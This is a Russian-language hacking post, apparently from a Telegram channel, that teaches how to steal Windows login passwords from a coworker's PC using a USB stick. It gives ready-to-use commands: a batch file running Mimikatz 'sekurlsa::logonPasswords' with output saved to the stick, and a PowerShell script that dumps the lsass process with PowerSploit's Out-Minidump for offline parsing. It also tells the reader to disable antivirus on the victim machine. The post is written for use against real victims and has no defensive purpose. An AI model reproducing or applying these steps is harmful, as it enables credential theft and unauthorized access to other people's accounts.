Флэшка воровка для Windows.
Mr. RobotНе так давно французский разработчик создал программу "Mimikatz" для воровства паролей различными способами. По умолчанию есть возможность воровать пароль из активной сессии или посредством дампа памяти одного процесса.
Скачиваем программу.
http://blog.gentilkiwi.com/mimikatz
Выбираем ссылку "binaries". Скачиваем любой архив. На данный момент актуальная версия - 2.0.
Нам нужно узнать целевую платформу жертвы. Работает программа только на Windows. Именно нам нужно знать архитектуру процессора: х86 или х64. Как только узнали из распакованного архива заходим в папочку с нужной целевой платформой и копируем все файлы прямо на флешку. Взламывать ПК мы будем с помощью флешки. Представьте, что все сотрудники работают на одном домене и для входа на любой аккаунт нужно узнать просто логин пароль, при этом, войти можно на любой ПК под системой Windows. В сериале "Mr. Robot" (2 сез., 9 сер.) используется ПК, на котором сессия активна, но ПК заблокирован. Я точно не уверен, но, скорее всего, на ПК в фоновом режиме запускается autorun, потом запускается в фоновом режиме mimikatz и автоматически вводятся нужные команды, выходная информация которых автоматически сохраняется на флешке. Но, в Mr. Robot используется не просто mimikatz а целые устройства!
Ниже будут два способа воровства паролей.
1) Воруем пароли из активной сессии!
Допустим, кто-то ушёл от ПК, и с Вами имеется ваша флешка с mimikatz. ПК остался не заблокированным, но доступ всё-же нам нужен постоянный. Как и ранее, по теории, мы работаем с жертвой в одном домене, и можем залогиниться под любым ПК в сети.
На Вашем ПК:
1) Создаём файл c.bat
2) В нём пишем:
@echo off
mimikatz "privilege::debug" "sekurlsa::logonPasswords" "exit" > c.txt
На ПК жертвы:
1) Отключаем антивирус на 1 минуту. Зависит от Вашей скорости работы.
2) Подключаем флешку и запускаем c.bat от имени администратора
3) Уже на своём ПК смотрим файл c.txt. В нём будет лог, в котором Вы сможете найти такую инфу, как "login, domain, password" и т.д.
2) Воруем пароли из дампа памяти!
Опять всё по теории как и в первом случае, но, на ПК не удаётся включить необходимый режим для воровства пароля.
На Вашем ПК:
1) В дополнение заходим на флешку, создаём файл под названием "Out-Minidump.ps1" и копируем в него содержимое отсюда:
https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1
Или отсюда
http://gavitex.com/share/75yw3omui
2) Создаём файл под названием "d.ps1". Записываем в него:
new-item -type directory -path $home\Documents\WindowsPowerShell\Modules
Copy-Item Out-Minidump.ps1 $home\Documents\WindowsPowerShell\Modules
import-module $home\Documents\WindowsPowerShell\Modules\Out-Minidump.ps1
Get-Process lsass | Out-Minidump
На ПК жервты:
1) Отключаем антивирус на 1 минуту. Зависит от Вашей скорости работы.
2) Открываем флешку, нажимаем ПКМ (Правая Кнопка Мыши) на файл d.ps1 и нажимаем "Выполнить в PowerShell". В папке появится файл с названием "lsass_XXX.dmp".
На Вашем ПК:
1) Открываем с флешки mimikatz, сначала пишем:
sekurlsa::minidump lsass_XXX.dmp
* где XXX — это номер из названия файла, посмотрите его на флешке
2) И под конец:
sekurlsa::logonPasswords
3) Смотрим пароли, наслаждаемся.
🔥 https://t.me/Torchik_brauser 🔥